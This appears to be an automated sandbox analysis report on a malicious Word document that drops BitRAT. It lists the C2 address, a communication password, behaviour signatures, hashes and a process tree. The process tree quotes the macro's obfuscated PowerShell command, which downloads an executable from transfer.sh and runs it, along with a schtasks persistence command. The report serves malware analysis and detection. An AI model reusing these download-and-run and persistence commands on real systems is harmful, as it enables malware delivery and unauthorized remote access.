Analysis

  • max time kernel
    39s
  • max time network
    79s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2023 15:14

General

  • Target

    Zapitvane_MACH_BULGARIA_EOOD_09_2023.doc

  • Size

    199KB

  • MD5

    3b92906782599469acffd05ba041942e

  • SHA1

    522183445616d131f3edf13e6ea93c9f19c9f52f

  • SHA256

    edce16eadba8d19990b2ff2e97420f07c1f4defe813ffe961f9cd777f8368b7b

  • SHA512

    c1f8a1259327db79f98467d2a9e2dce172c39e78541476722863eb7b6fa5c39f41c39ad574e7e0b65ed4ab0d8a7201665df1463f2aeaa2d456634c94e71e0f33

  • SSDEEP

    3072:NAN+svPwMrFoXiURMf8yS/TSTIs6sCbMD3itIm0QqgxJi+m:W33JodRU8yS/dLsZDyp0QZC

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Zapitvane_MACH_BULGARIA_EOOD_09_2023.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5032
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\ggxnw.exe;C:\Users\Public\ggxnw.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\ggxnw.exe;C:\Users\Public\ggxnw.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2836
        • C:\Users\Public\ggxnw.exe
          "C:\Users\Public\ggxnw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1764
          • C:\Users\Public\ggxnw.exe
            "C:\Users\Public\ggxnw.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2232
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
            5⤵
              PID:1816
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3664
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:4344
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c copy "C:\Users\Public\ggxnw.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
              5⤵
                PID:4156
      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        C:\Users\Admin\AppData\Roaming\pint\pint.exe
        1⤵
        • Executes dropped EXE
        PID:4940

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rkvtwiyj.bvq.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        449KB

        MD5

        de25d857eec2b8fe297c67f995ea9159

        SHA1

        7171ae11682ba9911f873d749117a2c275948a67

        SHA256

        0a1118fa714de1877dfa74548a1d261e80f7f0b303d84fa3fb2a286acb4e4ea0

        SHA512

        e28aa7692bdb6e43bedcb3d07b5de0eb97f1568d5c5331694e31065e22f36c6b9f04371f280b89184a3924759c0d37d28f3d9d30e9698879151f605b47129d6c

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        14KB

        MD5

        9fa0925d2033967ece043a5963571232

        SHA1

        87cee71358f937a4deab18e0b4aa4656ddd8a20d

        SHA256

        8ae5a0879324a46c1a0baabda3f5ab64ef264b9bd2950bec1a34dbe2a90e37d6

        SHA512

        9a5033bd4882b1e3624aeed94eb1b6d317691f1ad65bce4474f7f82af2547b7e41b5bf13aead3b02aa1a7014ce1c26b803b237624252d45619af189b105a0046

      • C:\Users\Public\ggxnw.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\ggxnw.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\ggxnw.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • memory/1764-58-0x0000000000480000-0x0000000000858000-memory.dmp
        Filesize

        3.8MB

      • memory/1764-59-0x0000000075190000-0x0000000075940000-memory.dmp
        Filesize

        7.7MB

      • memory/1764-60-0x00000000058C0000-0x0000000005E64000-memory.dmp
        Filesize

        5.6MB

      • memory/1764-61-0x0000000005300000-0x0000000005310000-memory.dmp
        Filesize

        64KB

      • memory/1764-70-0x0000000075190000-0x0000000075940000-memory.dmp
        Filesize

        7.7MB

      • memory/2232-73-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-65-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-75-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-72-0x00000000750A0000-0x00000000750D9000-memory.dmp
        Filesize

        228KB

      • memory/2232-71-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-76-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-77-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-78-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-66-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-74-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-79-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-64-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-62-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-80-0x0000000075440000-0x0000000075479000-memory.dmp
        Filesize

        228KB

      • memory/2232-81-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-82-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-83-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2232-84-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2836-48-0x00007FFF612F0000-0x00007FFF61DB1000-memory.dmp
        Filesize

        10.8MB

      • memory/2836-37-0x0000021EBC2E0000-0x0000021EBC2F0000-memory.dmp
        Filesize

        64KB

      • memory/2836-49-0x0000021EBC2E0000-0x0000021EBC2F0000-memory.dmp
        Filesize

        64KB

      • memory/2836-57-0x00007FFF612F0000-0x00007FFF61DB1000-memory.dmp
        Filesize

        10.8MB

      • memory/2836-47-0x0000021EBC2E0000-0x0000021EBC2F0000-memory.dmp
        Filesize

        64KB

      • memory/2836-31-0x0000021EBC590000-0x0000021EBC5B2000-memory.dmp
        Filesize

        136KB

      • memory/2836-35-0x00007FFF612F0000-0x00007FFF61DB1000-memory.dmp
        Filesize

        10.8MB

      • memory/2836-36-0x0000021EBC2E0000-0x0000021EBC2F0000-memory.dmp
        Filesize

        64KB

      • memory/5032-24-0x0000021CBCA80000-0x0000021CBDA50000-memory.dmp
        Filesize

        15.8MB

      • memory/5032-12-0x00007FFF4C110000-0x00007FFF4C120000-memory.dmp
        Filesize

        64KB

      • memory/5032-38-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB

      • memory/5032-40-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB

      • memory/5032-41-0x0000021CBCA80000-0x0000021CBDA50000-memory.dmp
        Filesize

        15.8MB

      • memory/5032-42-0x0000021CBCA80000-0x0000021CBDA50000-memory.dmp
        Filesize

        15.8MB

      • memory/5032-43-0x0000021CBCA80000-0x0000021CBDA50000-memory.dmp
        Filesize

        15.8MB

      • memory/5032-0-0x00007FFF4E5F0000-0x00007FFF4E600000-memory.dmp
        Filesize

        64KB

      • memory/5032-23-0x0000021CBCA80000-0x0000021CBDA50000-memory.dmp
        Filesize

        15.8MB

      • memory/5032-22-0x0000021CBCA80000-0x0000021CBDA50000-memory.dmp
        Filesize

        15.8MB

      • memory/5032-13-0x00007FFF4C110000-0x00007FFF4C120000-memory.dmp
        Filesize

        64KB

      • memory/5032-39-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB

      • memory/5032-11-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB

      • memory/5032-10-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB

      • memory/5032-5-0x00007FFF4E5F0000-0x00007FFF4E600000-memory.dmp
        Filesize

        64KB

      • memory/5032-9-0x00007FFF4E5F0000-0x00007FFF4E600000-memory.dmp
        Filesize

        64KB

      • memory/5032-8-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB

      • memory/5032-7-0x00007FFF4E5F0000-0x00007FFF4E600000-memory.dmp
        Filesize

        64KB

      • memory/5032-6-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB

      • memory/5032-3-0x00007FFF4E5F0000-0x00007FFF4E600000-memory.dmp
        Filesize

        64KB

      • memory/5032-4-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB

      • memory/5032-2-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB

      • memory/5032-1-0x00007FFF8E570000-0x00007FFF8E765000-memory.dmp
        Filesize

        2.0MB